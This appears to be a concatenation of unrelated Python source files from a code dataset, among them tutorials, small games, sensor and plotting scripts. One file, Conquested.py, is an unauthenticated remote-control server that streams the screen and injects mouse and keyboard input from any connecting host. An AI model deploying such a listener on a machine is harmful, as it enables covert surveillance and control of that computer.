capped_cpu = 1
# inverse_cpu = 1 - cpu_usage
agitation = (capped_cpu/1.2)**7
return agitation
def next_board(board, section_width, agitation_factors, wrap):
"""Given a board, return the board one interation later.
Adapted from Jack Diedrich's implementation from his 2012 PyCon talk "Stop
Writing Classes"
:arg wrap: A callable which takes a point and transforms it, for example
to wrap to the other edge of the screen. Return None to remove a point.
"""
new_board = {}
# We need consider only the points that are alive and their neighbors:
points_to_recalc = set(board.iterkeys()) | set(chain(*map(neighbors, board)))
for point in points_to_recalc:
agitation_factor = agitation_factors[point[0]/section_width]
count = sum((neigh in board) for neigh in
(wrap(n) for n in neighbors(point) if n))
if point in board:
if count == 2 or count == 3:
state = 0 if board[point] < 2 else 2
else:
state = None
else:
if count == 3:
state = 1
elif (count == 2 or count == 4) and agitation_factor > random():
state = 3
else:
state = None
if state is not None:
wrapped = wrap(point)
if wrapped:
new_board[wrapped] = state
return new_board
def neighbors((x, y)):
"""Return the (possibly out of bounds) neighbors of a point."""
yield x + 1, y
yield x - 1, y
yield x, y + 1
yield x, y - 1
yield x + 1, y + 1
yield x + 1, y - 1
yield x - 1, y + 1
yield x - 1, y - 1
# class BoredomDetector(object):
# """Detector of when the simulation gets stuck in a loop"""
# # Get bored after (at minimum) this many repetitions of a pattern:
# REPETITIONS = 14
# # We can detect cyclical patterns of up to this many iterations:
# PATTERN_LENGTH = 4
# def __init__(self):
# # Make is_bored_of() init the state the first time through:
# self.iteration = self.REPETITIONS * self.PATTERN_LENGTH + 1
# self.num = self.times = 0
# def is_bored_of(self, board):
# """Return whether the simulation is probably in a loop.
# This is a stochastic guess. Basically, it detects whether the
# simulation has had the same number of cells a lot lately. May have
# false positives (like if you just have a screen full of gliders) or
# take awhile to catch on sometimes. I've even seen it totally miss the
# boat once. But it's simple and fast.
# """
# self.iteration += 1
# if len(board) == self.num:
# self.times += 1
# is_bored = self.times > self.REPETITIONS
# if self.iteration > self.REPETITIONS * self.PATTERN_LENGTH or is_bored:
# # A little randomness in case things divide evenly into each other:
# self.iteration = randint(-2, 0)
# self.num = len(board)
# self.times = 0
# return is_bored
if __name__ == '__main__':
main()
| true |
f15483ab74e3c6abc5dab5787f532b9addf5a139 | Python | CyberAmiAsaf/Control-Conquer | /controlled/Conquested.py | UTF-8 | 5,708 | 2.921875 | 3 | [] | no_license | __author__ = 'Cyber-01'
import socket
import time
from PIL import ImageGrab
import multiprocessing
import win32api,win32con
import sys
SCREEN_PORT = 2346
MOUSE_PORT = 3456
KEYBOARD_PORT = 5678
SCREEN_DELAY_TIME = 0.05
SCREENSHOT_NAME = "scrn.png"
def screen():
"""
A function that takes screenshots throughout the connection and sends them to the controller
"""
print "Server Running"
server_socket = socket.socket()
server_socket.bind(('0.0.0.0',SCREEN_PORT)) # Start the socket's server
server_socket.listen(5)
(new_socket, address) = server_socket.accept()
print "Client Connected"
last_binary_data = ""
while True:
last_binary_data = ""
img = ImageGrab.grab(bbox=None) # Take screen shot
img.save(SCREENSHOT_NAME) # Save screen shot
fp = open(SCREENSHOT_NAME,'rb') # open screen shot file to read
data = fp.read() # Read all
while data != last_binary_data: # while not all the data is sent
new_socket.send(data) # Send all data
last_binary_data = data
fp.close() # Close file
time.sleep(SCREEN_DELAY_TIME) # Delay in order to boost quality
def mouse_click(button,x,y):
"""
A function that receives which button was clicked and the coordinates of the mouse, and clicks accordingly
"""
if button == "L":
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,x,y,0,0)
if button == "R":
win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN,x,y,0,0)
if button == "M":
win32api.mouse_event(win32con.MOUSEEVENTF_MIDDLEDOWN,x,y,0,0)
def mouse_release(button,x,y):
"""
A function that receives which button was released and the coordinates of the mouse, and releases accordingly
"""
if button == "L":
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,x,y,0,0)
if button == "R":
win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP,x,y,0,0)
if button == "M":
win32api.mouse_event(win32con.MOUSEEVENTF_MIDDLEUP,x,y,0,0)
def mouse_wheel_movement(button, x, y):
"""
A function that receives the mouse wheel's movement and the coordinates of the mouse, and moves accordingly
"""
if button == "-1":
win32api.mouse_event(win32con.MOUSEEVENTF_WHEEL,x ,y ,-win32con.WHEEL_DELTA,0)
if button == "1":
win32api.mouse_event(win32con.MOUSEEVENTF_WHEEL,x ,y ,win32con.WHEEL_DELTA,0)
def mouse():
"""
A function that receives the mouse movement from the controller and acts accordingly
"""
mouse_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # Client Startup to udp
mouse_socket.bind(('0.0.0.0',MOUSE_PORT))
while True:
try:
data,address = mouse_socket.recvfrom(1024)
if len(data) > 2:
position = data.split(",")
x = int(position[0][1:])
y = int(position[1][:-1])
win32api.SetCursorPos((x,y)) # A function that receives the mouse coordinates and sets them accordingly
if len(data) == 2:
if data[1] == "L":
if data[0] == "*":
mouse_click(data[1],x,y) # Left mouse Click
else:
mouse_release(data[1],x,y) # Left mouse Release
if data[1] == "R":
if data[0] == "*":
mouse_click(data[1],x,y) # Right mouse Click
else:
mouse_release(data[1],x,y) # Right mouse Release
if data[1] == "M":
if data[0] == "*":
mouse_click(data[1],x,y) # Middle mouse Click
else:
mouse_release(data[1],x,y) # Middle mouse Release
if data[1] == "1":
mouse_wheel_movement(data, x, y) # Mouse wheel movement
if len(data) == 1:
mouse_wheel_movement(data, x, y) # Mouse wheel movement
except:
pass
def key_press(data):
"""
A function that receives the key that the controller sent and presses them
"""
key = data[0][1:]
key = int(key,16) # Convert hex string to int
win32api.keybd_event(key,0,0,0)
def key_release(data):
"""
A function that receives the key that the controller sent and releases them
"""
key = data[0][1:]
key = int(key,16) # Convert hex string to int
win32api.keybd_event(key,0,win32con.KEYEVENTF_KEYUP,0)
def keyboard(process_list):
"""
A function that receives the controller's keyboard events and acts accordingly
"""
keyboard_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # Client Startup to udp
keyboard_socket.bind(('0.0.0.0',KEYBOARD_PORT))
while True:
try:
data = keyboard_socket.recvfrom(1024)
if data[0] == "Pause":
process_list[0].terminate()
process_list[1].terminate()
sys.exit()
elif data[0][0] == "*":
key_press(data)
if data[0][0] == "^":
key_release(data)
except:
continue
def main():
process_list = []
screen_process = multiprocessing.Process(target= screen)
screen_process.start()
process_list.append(screen_process)
mouse_process = multiprocessing.Process(target=mouse)
mouse_process.start()
process_list.append(mouse_process)
keyboard_process = multiprocessing.Process(target=keyboard(process_list))
keyboard_process.start()
process_list.append(keyboard_process)
if __name__ == '__main__':
main() | true |
261360b0c34e8b35583efb61e742c2c0415bb50e | Python | BrutalWinter/TF_tutorial | /2 Text generation with an RNN.py | UTF-8 | 6,226 | 3.71875 | 4 | [] | no_license | import tensorflow as tf
import numpy as np
import os
import time
path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')
# First, look in the text: Read, then decode for py2 compat.
text = open(path_to_file, 'rb').read().decode(encoding='utf-8')
print('Length of text: {} characters'.format(len(text)))
# Take a look at the first 250 characters in text
print(text[:250])
# The unique characters in the file
vocab = sorted(set(text))
print('{} unique characters'.format(len(vocab)))
# Vectorize the text
# Before training, you need to map strings to a numerical representation. Create two lookup tables: one mapping characters to numbers, and another for numbers to characters.
# Creating a mapping from unique characters to indices
char2idx = {u:i for i, u in enumerate(vocab)}
idx2char = np.array(vocab)
print('idx2char',idx2char)
text_as_int = np.array([char2idx[c] for c in text])
# Now you have an integer representation for each character. Notice that you mapped the character as indexes from 0 to len(unique).
print('{')
for char,_ in zip(char2idx, range(30)):
print(' {:4s}: {:3d},'.format(repr(char), char2idx[char]))
print('}')
# Show how the first 13 characters from the text are mapped to integers
print('{} ---- characters mapped to int ---- > {}'.format(repr(text[:13]), text_as_int[:13]))
######################## The prediction task
# 1. Given a character, or a sequence of characters, what is the most probable next character?
# This is the task you're training the model to perform. The input to the model will be a sequence of characters,
# and you train the model to predict the output—the following character at each time step.
# 2. Since RNNs maintain an internal state that depends on the previously seen elements, given all the characters computed until this moment, what is the next character?
# 3. Create training examples and targets:
# Next divide the text into example sequences. Each input sequence will contain seq_length characters from the text.
# For each input sequence, the corresponding targets contain the same length of text, except shifted one character to the right.
# So break the text into chunks of seq_length+1. For example, say seq_length is 4 and our text is "Hello". The input sequence would be "Hell", and the target sequence "ello".
# To do this first use the tf.data.Dataset.from_tensor_slices function to convert the text vector into a stream of character indices.
# The maximum length sentence you want for a single input in characters
seq_length = 100
examples_per_epoch = len(text)//(seq_length+1)
# Create training examples / targets
char_dataset = tf.data.Dataset.from_tensor_slices(text_as_int)
for i in char_dataset.take(15):
print(idx2char[i.numpy()])
sequences = char_dataset.batch(seq_length+1, drop_remainder=True)
for item in sequences.take(2):
print(item, len(item))
print(idx2char[item.numpy()])
A=repr(''.join(idx2char[item.numpy()]))
print(A,len(A))
# For each sequence, duplicate and shift it to form the input and target text by using the map method to apply a simple function to each batch:
print('sequences',sequences)
def split_input_target(chunk):
input_text = chunk[:-1]
target_text = chunk[1:]
return input_text, target_text
dataset = sequences.map(split_input_target)
print('dataset',dataset)
# Each index of these vectors is processed as a one time step.
# For the input at time step 0, the model receives the index for "F" and tries to predict the index for "i" as the next character.
# At the next timestep, it does the same thing but the RNN considers the previous step context in addition to the current input character.
for input_example, target_example in dataset.take(2):
print('Input data: ', repr(''.join(idx2char[input_example.numpy()])),input_example.shape)
print('Target data:', repr(''.join(idx2char[target_example.numpy()])),target_example.shape)
for i, (input_idx, target_idx) in enumerate(zip(input_example[:5], target_example[:5])):
print("Step {:4d}".format(i))
print(" input: {} ({:s})".format(input_idx, repr(idx2char[input_idx])))
print(" expected output: {} ({:s})".format(target_idx, repr(idx2char[target_idx])))
BATCH_SIZE = 64
# Buffer size to shuffle the dataset (TF data is designed to work with possibly infinite sequences, so it doesn't attempt to shuffle the entire sequence in memory.
# Instead, it maintains a buffer in which it shuffles elements).
BUFFER_SIZE = 10000
dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True)
print('dataset',dataset)
# Use tf.keras.Sequential to define the model. For this simple example three layers are used to define our model:
# 1.tf.keras.layers.Embedding: The input layer. A trainable lookup table that will map the numbers of each character to a vector with embedding_dim dimensions;
# 2.tf.keras.layers.GRU: A type of RNN with size units=rnn_units (You can also use an LSTM layer here.)
# 3.tf.keras.layers.Dense: The output layer, with vocab_size outputs.
vocab_size = len(vocab)# Length of the vocabulary in chars
embedding_dim = 256# The embedding dimension
rnn_units = 1024# Number of RNN units
def build_model(vocab_size, embedding_dim, rnn_units, batch_size):
model = tf.keras.Sequential([
tf.keras.layers.Embedding(vocab_size, embedding_dim, batch_input_shape=[batch_size, None]),
tf.keras.layers.GRU(rnn_units, return_sequences=True, stateful=True, recurrent_initializer='glorot_uniform'),
tf.keras.layers.Dense(vocab_size)
])
return model
model = build_model(vocab_size=len(vocab),embedding_dim=embedding_dim,rnn_units=rnn_units,batch_size=BATCH_SIZE)
# First check the shape of the output:
for input_example_batch, target_example_batch in dataset.take(1):
example_batch_predictions = model(input_example_batch)
print(example_batch_predictions.shape, "# (batch_size, sequence_length, vocab_size)")
# In the above example the sequence length of the input is 100 but the model can be run on inputs of any length:
model.summary()
######################## Try the model
| true |
3f77bb134a0b7c9fa8c02eac1254afab089a0e93 | Python | nrkn/SimpleRL | /python/SimpleRL.py | UTF-8 | 1,370 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import curses
MAP = [
'#### ####',
'# #### #',
'# #',
'## ##',
' # # ',
' # # ',
'## ##',
'# #',
'# #### #',
'#### ####',
]
KEY_QUIT = ord('q')
DIRECTIONS = {
curses.KEY_UP: (0, -1),
curses.KEY_RIGHT: (1, 0),
curses.KEY_DOWN: (0, 1),
curses.KEY_LEFT: (-1, 0),
}
class BlockedMovement(Exception):
pass
class Game(object):
def __init__(self, screen):
self.screen = screen
self.x, self.y = 2, 2
def move_player(self, (dx, dy)):
x, y = self.x + dx, self.y + dy
if MAP[y][x] != ' ':
raise BlockedMovement()
self.x, self.y = x, y
def main(self):
for row in MAP:
self.screen.addstr(row + '\n')
key = None
while key != KEY_QUIT:
self.screen.addstr(self.y, self.x, '@')
key = self.screen.getch()
try:
direction = DIRECTIONS[key]
except KeyError:
pass
else:
self.screen.addstr(self.y, self.x, ' ')
try:
self.move_player(direction)
except BlockedMovement:
pass
if __name__ == '__main__':
curses.wrapper(lambda screen: Game(screen).main())
| true |
c14dedc7a122dfed2206bf21ada4b16c14ff6ce3 | Python | Caatu/RASP-SERVER | /main.py | UTF-8 | 3,815 | 2.640625 | 3 | [] | no_license | #!/usr/bin/python3
import json, time, os, sys
import paho.mqtt.client as mqtt
import getpass
from dotenv import load_dotenv
from callbacks import *
from getsensors import *
from alerts import *
from time import sleep
def initializeConnection(username, password, client_id, broker, port):
"""
Create client object and initialize the connection with mqtt server
More about client object:
http://www.steves-internet-guide.com/client-objects-python-mqtt/
"""
global client
mqtt.Client.connected_flag = False # Control Tag (Network loop)
mqtt.Client.bad_connection_flag = False
client = mqtt.Client(
client_id=client_id,
clean_session=False,
)
client.on_connect = on_connect
client.on_log = on_log
client.on_message = on_message
client.username_pw_set(username=username, password=password)
print("Connecting to broker")
#try:
client.connect(broker,port=port)
#except:
# print("Connection failed")
# client.bad_connection_flag = True
client.loop_start()
# Wait to connection success or error occur
while not client.connected_flag and not client.bad_connection_flag:
print("In wait loop")
time.sleep(1)
if client.bad_connection_flag:
# When occur error in connection stop the program
# TODO: Filter possibles errors in on_conect and print this on log file
finish()
print("In Main Loop")
def finish():
"""
Finish the loop of callbacks from paho-mqtt and exit the program
"""
client.disconnect()
client.loop_stop()
sys.exit()
def generateObjetc(measurement, unit):
"""
Generate an python dict and serialize to json object
"""
data = {
'measurement': measurement,
'unit': unit
}
return json.dumps(data)
def getMAC():
# Return the MAC address of the specified interface
try:
str = open('/sys/class/net/%s/address' % getEthName()).read()
except:
str = "00:00:00:00:00:00"
return str[0:17]
def getEthName():
# Get name of the Ethernet interface
try:
for root,dirs,files in os.walk('/sys/class/net'):
for dir in dirs:
if dir[:3]=='enx' or dir[:3]=='eth':
interface=dir
except:
interface="None"
return interface
def sendData(topic, jsonObject):
"""
Publish string to connected client
"""
client.publish(topic,jsonObject)
print("Data sent")
def subscribeTopic(topic):
"""
Subscribe to an topic in connected client
"""
client.subscribe(topic)
def main():
"""
Start the script, loading all settings and starting connections
UNDER DEVELOPMENT, ONLY TESTS HERE...
"""
# Loading dotenv data
envpath = os.getcwd()+"/.env"
load_dotenv(verbose=True,dotenv_path = envpath)
username = os.getenv("BROKER-USERNAME")
password = os.getenv("BROKER-PASSWORD")
client_id = getpass.getuser()
broker = os.getenv("BROKER-IP")
port = int(os.getenv("BROKER-PORT"))
# Initializing components
initializeConnection(username,password,client_id,broker,port)
# Subscribe to receive all messages.... Tests...
subscribeTopic('/gustavoguerino2@gmail.com/#')
# Sending data
error = False
while(not error):
sensorList = getSensorsList()
for sensor in sensorList:
topic = "/gustavoguerino2@gmail.com/{}/{}/{}/".format(getMAC(), sensor['name'], sensor['meassurementType'])
data = generateObjetc(sensor['meassurement'] ,sensor['meassurementUnit'])
sendData(topic,data)
# Check alerts
compareAlerts(sensorList)
# Sleep 1 seconds and send data again
time.sleep(1)
if __name__ == "__main__":
# execute only if run as a script
main()
| true |
5f2c258d6410016ffd1ed4092a9e99ef77b09db7 | Python | williamd4112/simple-svm | /plot.py | UTF-8 | 1,038 | 3.078125 | 3 | [] | no_license | import matplotlib.pyplot as plt
import numpy as np
def plot_decision_boundary(func, x_, t_, xo_, to_, xt_, tt_, h):
x_min = x_[:, 0].min()
x_max = x_[:, 0].max()
y_min = x_[:, 1].min()
y_max = x_[:, 1].max()
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
#Z = func(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
#Z = Z.reshape(xx.shape)
plt.figure(1, figsize=(4, 3))
#plt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired)
# Plot also the training points
plt.scatter(xt_[:, 0], xt_[:, 1], s=4, c=tt_, edgecolors='k', cmap=plt.cm.Paired)
plt.scatter(x_[:, 0], x_[:, 1], s=50, c=t_, marker='o', cmap=plt.cm.Paired)
plt.scatter(xo_[:, 0], xo_[:, 1], s=250, c=to_, marker='x', cmap=plt.cm.Paired)
plt.xlabel('x1')
plt.ylabel('x2')
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.xticks(())
plt.yticks(())
plt.show()
if __name__ == '__main__':
plot_decision_boundary(None, 0, 0, 255, 255, 10)
| true |
c2515e376f5dec51ac5e3e80a65dbea30ffb81ef | Python | hotoku/samples | /python/asyncio/9.py | UTF-8 | 404 | 3.4375 | 3 | [] | no_license | """
asyncではない関数を並列実行するには、loop.run_in_executorを使う。
https://docs.python.org/ja/3/library/asyncio-eventloop.html
"""
import asyncio
from time import sleep
def f(n):
print(n)
sleep(1)
async def main():
loop = asyncio.get_event_loop()
await asyncio.gather(*[
loop.run_in_executor(None, f, i) for i in range(10)
])
asyncio.run(main())
| true |
f6b19c8c329cd11f96082aabc0470bb4c2af2be2 | Python | Sandy4321/DigitalCircuits | /LogicExpression.py | UTF-8 | 8,734 | 3.390625 | 3 | [] | no_license | __author__ = 'multiangle'
class LogicExpression():
def __init__(self,expression):
"""
:param expression:
:return:
规定几种运算符号: 或运算 +
与运算 *或者没有
非运算 []
异或运算 #
ATTENTION:不区分大小写,统一按大写看待
"""
self.variables=[] #参数列表(输入值)
self.truth_table=None #真值表
self.truth_table_short=None
self.karnaugh_map=None #卡诺图
if expression=='':
raise ValueError('void string!')
expression=expression.replace(' ','')
expression=list(expression)
for i in range(0,expression.__len__()):
char=expression[i]
if ord(char)>=97 and ord(char)<=122:
char=char.upper()
expression[i]=char
if char not in self.variables:
self.variables.append(char)
elif ord(char)>=65 and ord(char)<=90:
if char not in self.variables:
self.variables.append(char)
self.variables.sort()
self.expression=''.join(expression)
self.Generate_Truth_Table()
self.Generate_Karnaugh_Map()
def Generate_Truth_Table(self):
truth_table=[]
truth_table.append(self.variables+['Y'])
for i in range(0,2**self.variables.__len__()):
local_expression=self.expression
variable_value=list(bin(i))[2:]
variable_value=['0']*(self.variables.__len__()-variable_value.__len__())+variable_value
for x in range(0,self.variables.__len__()):
local_expression=local_expression.replace(self.variables[x],variable_value[x])
local_res=self.cal_expression(local_expression)
truth_table.append(variable_value+[local_res])
self.truth_table=truth_table
self.truth_table_short=[[''.join(x[0:x.__len__()-1]),x[x.__len__()-1]] for x in self.truth_table]
# self.Print_Truth_Table() local_expression=local_expression.replace(self.variables[x],variable_value[x])
def Print_Truth_Table(self):
lines=self.truth_table.__len__()
cols=self.truth_table[0].__len__()
print(('|---')*cols+'|')
for line in self.truth_table:
output='|'
for col in line:
output+=str(col)+'\t'+'|'
print(output)
# print(('|---')*cols+'|')
print(('|---')*cols+'|')
def Generate_Karnaugh_Map(self):
tag_list=[x[0] for x in self.truth_table_short]
tag_value=[x[1] for x in self.truth_table_short]
if self.variables.__len__()==1:
label_1=['0','1']
label_2=['']
if self.variables.__len__()==2:
label_1=['0','1']
label_2=['0','1']
if self.variables.__len__()==3:
label_1=['0','1']
label_2=['00','01','11','10']
if self.variables.__len__()==4:
label_1=['00','01','11','10']
label_2=['00','01','11','10']
map=[[0 for col in range(label_2.__len__())] for row in range(label_1.__len__())]
for x in range(0,label_1.__len__()):
for y in range(0,label_2.__len__()):
tag=''.join([label_1[x],label_2[y]])
map[x][y]=tag_value[tag_list.index(tag)]
self.karnaugh_map={
'value':map,
'l1':label_1,
'l2':label_2
}
def cal_expression(self,expression):
init_stack=[] #括号运算
for x in expression:
if x!=')':
init_stack.append(x)
else:
sub_expression=[]
while(True):
item=init_stack.pop()
if item=='(':
break
else:
sub_expression.insert(0,item)
sub_value=self.cal_expression(''.join(sub_expression))
init_stack.append(sub_value)
expression=''.join(init_stack)
init_stack=[] #非运算
for x in expression:
if x!=']':
init_stack.append(x)
else:
sub_expression=[]
while(True):
item=init_stack.pop()
if item=='[':
break
else:
sub_expression.insert(0,item)
sub_value=self.cal_expression(''.join(sub_expression))
if sub_value==0 or sub_value=='0':
sub_value='1'
elif sub_value==1 or sub_value=='1':
sub_value='0'
init_stack.append(sub_value)
expression=''.join(init_stack)
# print(expression)
num_stack=[]
sig_stack=[]
num_stack.append(expression[0])
for i in range(1,expression.__len__()):
if expression[i] in ['0','1']:
if expression[i-1] in ['0','1']:
num_stack.append(expression[i])
sig_stack.append('*')
else:
num_stack.append(expression[i])
else:
if expression[i]=='+' or expression=='#':
if sig_stack.__len__()==0:
sig_stack.append(expression[i])
else:
if sig_stack[sig_stack.__len__()-1]=='+' or sig_stack[sig_stack.__len__()-1]=='#':
sig_stack.append(expression[i])
else:
while True:
a=num_stack.pop()
b=num_stack.pop()
sig=sig_stack.pop()
res=self.logic_cal(a,b,sig)
num_stack.append(res)
if sig_stack.__len__()==0:
sig_stack.append(expression[i])
break
if sig_stack[sig_stack.__len__()-1]=='+' or sig_stack[sig_stack.__len__()-1]=='#' :
sig_stack.append(expression[i])
break
else:
sig_stack.append(expression[i])
while True:
if sig_stack.__len__()==0:
break
a=num_stack.pop()
b=num_stack.pop()
sig=sig_stack.pop()
res=self.logic_cal(a,b,sig)
num_stack.append(res)
return num_stack[0]
def Plot_Karnaugh_Map(self):
row_num=self.karnaugh_map['l1'].__len__()+1
col_num=self.karnaugh_map['l2'].__len__()+1
# print('|'+'---|'*col_num) #第一行的上限
content='|'+'\t'+'|'
for x in self.karnaugh_map['l2']:
content+=x+'\t'+'|'
print(content)
# print('|'+'---|'*col_num)
for i in range(0,self.karnaugh_map['l1'].__len__()):
content='|'+self.karnaugh_map['l1'][i]+'\t'+'|'
for j in range(0,self.karnaugh_map['l2'].__len__()):
content+=self.karnaugh_map['value'][i][j]+'\t'+'|'
print(content)
# print('|'+'---|'*col_num)
def Equal_To(self,b_expression):
cmp_obj=LogicExpression(b_expression)
if self.karnaugh_map['value']==cmp_obj.karnaugh_map['value']:
return True
else:
return False
def logic_cal(self,in_1,in_2,sig):
#sig='+','*','#'
if isinstance(in_1,str) or isinstance(in_2,str):
in_1=int(in_1)
in_2=int(in_2)
if sig=='+':
if in_1==1 or in_2==1:
return '1'
else:
return '0'
elif sig=='*':
if in_1==1 and in_2==1:
return '1'
else:
return '0'
elif sig=='#':
if in_1==in_2:
return '0'
else:
return '1'
if __name__=='__main__':
# x='([a+c]+[d])(a+bc)([a]+b)'
# x='[ac][d]+a(b+c)+[a]b'
x='[c][b][a]+c#b'
x='[b]c+b[c]+[a][b][c]'
a=LogicExpression(x)
# print('|'+'---'+'|'+'---')
# print('|'+'AB'+'\t'+'|')
# print('-'+'---'+'-')
# for x in a.truth_table_short:
# print(x)
# print(a.truth_table_short)
# a.Plot_Karnaugh_Map()
# b=LogicExpression('a')
print(a.karnaugh_map)
for i in a.karnaugh_map['value']:
print(i) | true |
8137eae40cade66d01b751000dd8a4f4c87d3303 | Python | wsanchez/sample-klein-app | /src/sample_klein_app/application/test/unittest.py | UTF-8 | 1,385 | 2.71875 | 3 | [] | no_license | """
Extensions to :mod:`twisted.trial.unittest`
"""
from twisted.internet.defer import Deferred, ensureDeferred
from twisted.trial import unittest
__all__ = (
"TestCase",
)
class TestCase(unittest.SynchronousTestCase):
"""
A unit test. The atom of the unit testing universe.
This class extends :class:`twisted.trial.unittest.SynchronousTestCase`.
It does not extend :class:`twisted.trial.unittest.TestCase`, because tests
that are themselves asynchronous cause some known problems, and one should
be able to unit test code synchronously.
"""
def successResultOf(self, deferred: Deferred):
"""
Override
:meth:`twisted.trial.unittest.SynchronousTestCase.successResultOf` to
enable handling of coroutines as well as
:class:`twisted.internet.defer.Deferred` s.
"""
deferred = ensureDeferred(deferred)
return unittest.TestCase.successResultOf(self, deferred)
# def failureResultOf(self, deferred: Deferred, *expectedExceptionTypes):
# """
# Override
# :meth:`twisted.trial.unittest.SynchronousTestCase.failureResultOf` to
# enable handling of coroutines as well as
# class:`twisted.internet.defer.Deferred` s.
# """
# deferred = ensureDeferred(deferred)
# return unittest.TestCase.failureResultOf(self, deferred)
| true |
248bbe17a6ed4ec00b97c83db17c1d4b5986bc9c | Python | somyungsub/kosta-pythonbasic | /day01/day01_6_1.py | UTF-8 | 223 | 3.8125 | 4 | [] | no_license |
# split
a = 'a-b-c-d-e-f-g'
print(a.split("-")) # 리스트로
print(",".join(a.split("-"))) # 리스트 -> 문자열로 합치기
print("".join(a.split("-"))) # 리스트 -> 문자열로 합치기
print(a) | true |
1cb94fe022a06b11504abe6c7d16151c2c2687d6 | Python | M-Bentley/Lab8 | /lab8.py | UTF-8 | 1,968 | 3.953125 | 4 | [] | no_license | import random
damageByMonster = random.randint(1,35)
personHealth = 100
monsterHealth = 100
punchDmg = 5
swordDmg = 10
fireball = 30
print 'A monster approaches! Prepare to fight!'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'You have 100 health'
print 'The monster has 100 health'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'What attack do you wish to use?'
print ' 1 - Punch, 2 - Sword, 3 - Fireball'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
userInput = int(raw_input())
while(monsterHealth > 0):
userInput = int(raw_input())
if userInput == 1:
monsterHealth = monsterHealth - punchDmg
personHealth = personHealth - damageByMonster
damageByMonster = random.randint(1,35)
print 'You strike the monster with your fist!'
print 'The monster has', monsterHealth, ' health.'
print 'Ouch! The monster hits you for', damageByMonster, ' damage'
print 'You have', personHealth, ' health'
elif userInput == 2:
monsterHealth = monsterHealth - swordDmg
personHealth = personHealth - damageByMonster
damageByMonster = random.randint(1,35)
print 'You strike the monster with your sword!'
print 'The monster has', monsterHealth, ' health.'
print 'Ouch! The monster hits you for', damageByMonster, ' damage'
print 'You have', personHealth, ' health'
elif userInput == 3:
monsterHealth = monsterHealth - fireball
personHealth = personHealth - damageByMonster
damageByMonster = random.randint(1,35)
print 'You strike the monster with a fireball!'
print 'The monster has', monsterHealth, ' health.'
print 'Ouch! The monster hits you for', damageByMonster, ' damage'
print 'You have', personHealth, ' health'
if personHealth <= 0:
print 'You died'
monsterHealth = -100
elif monsterHealth <= 0:
print 'It died'
personHealth = -100 | true |
cc9dbf8c013a092e6fe1b9c9bb481b576c5441df | Python | bguest/house-of-enlightenment | /python/effects/debugging_effects.py | UTF-8 | 1,833 | 2.515625 | 3 | [] | no_license | from hoe import color_utils
from hoe.animation_framework import Scene
from hoe.animation_framework import Effect
from hoe.state import STATE
class PrintOSC(Effect):
"""A effect layer that just prints OSC info when it changes"""
def next_frame(self, pixels, t, collaboration_state, osc_data):
if osc_data.contains_change:
print "Frame's osc_data is", osc_data
class MovingDot(Effect):
""" Draw a moving dot in the order of the pixels in the array"""
def __init__(self, spark_rad=8, t=0):
Effect.__init__(self)
self.spark_rad = spark_rad
self.start_time = t
def next_frame(self, pixels, t, collaboration_state, osc_data):
spark_ii = ((t - self.start_time) * 80) % STATE.layout.n_pixels
for ii, c in [(int((spark_ii + x) % STATE.layout.n_pixels), 255 - x * 128 / self.spark_rad)
for x in range(self.spark_rad)]:
pixels[ii] = (c, c, c)
class FailureEffect(Effect):
"""Force a failure after X frame"""
def __init__(self, frames=30):
self.frames = 30
def next_frame(self, pixels, now, collaboration_state, osc_data):
self.frames -= 1
if self.frames < 0:
raise Exception("Nobody expects me!")
# FIXME : A little hacky - trying to avoid circular dependencies with generic_effects
from generic_effects import NoOpCollaborationManager
from generic_effects import SolidBackground
__all__ = [
Scene("osc printer", NoOpCollaborationManager(), PrintOSC(), SolidBackground(30, 30, 30)),
# Not a real effect. Just testing failures in effect code against the gulp server
# Scene("failquick", NoOpCollaborationManager(), SolidBackground(0, 255, 0), FailureEffect()),
Scene("bluewithdot", NoOpCollaborationManager(), SolidBackground(0, 255, 0), MovingDot())
]
| true |
2e29009d27298db662ab1143772b0e7371274863 | Python | akhilgeorge005/thesis | /lig_input_data.py | UTF-8 | 6,220 | 2.84375 | 3 | [] | no_license |
from sklearn.ensemble import RandomForestRegressor
def input_data():
# DEFINE CUSTOM MODEL TO INSERT INTO MODEL SELECTION LIST
#########################################################
# rfr = RandomForestRegressor(n_estimators = 750, verbose = 2)
#########################################################
#### GENERIC INFO ###
# the input df is better having a columns 'year' (year of fire) and 'season' (value 1 winter and 2 summer)
# coordinates must be called as x and y
# in input dfa column name natural_reg can be added with more info about the vegetated zones
# points and fire df must be .pkl format
# I want a column 'point_index' in points_df
# are you going to do a regression? fires_df has to have a column called 'fire' for describing their frequency
# put 1 fold if you want to skip the validation
input_data = {'region_name' : 'LiguriaNew',
'path_dem' : '/home/gruppo4/Regioni/Liguria/new_data_32632/dem_100_32632.tif', # path of the dem tif file
'ntree' : 1000,
# if True the test dataset is created by taking random points
'random_years' : False,
# starting year of wildfire dataset
'year_from' : 2007,
# the year in which the test dataset is created if random_years = False, otherwise it takes random points among year = last year - year_test
'year_test' : 2015,
# the last year of the time period considered for the wildfires
'year_to' : 2019,
# put the output path with the / final. Note that inside there will be ceated a new output folder with the experiments
'data_dir' : '/home/gruppo4/Regioni/Liguria/new_data_32632/',
# True if i use 2 different datasets for training and for creating the final map
'two_points_df' : False,
# path of the training dataset
'training_df_path' : '/home/gruppo4/Regioni/Liguria/new_data_32632/points.pkl',#, '/home/gruppo4/liguria-fire-susceptibility/data_lig_s/points_clc.pkl'
# path of the dataset for the final susceptibility map
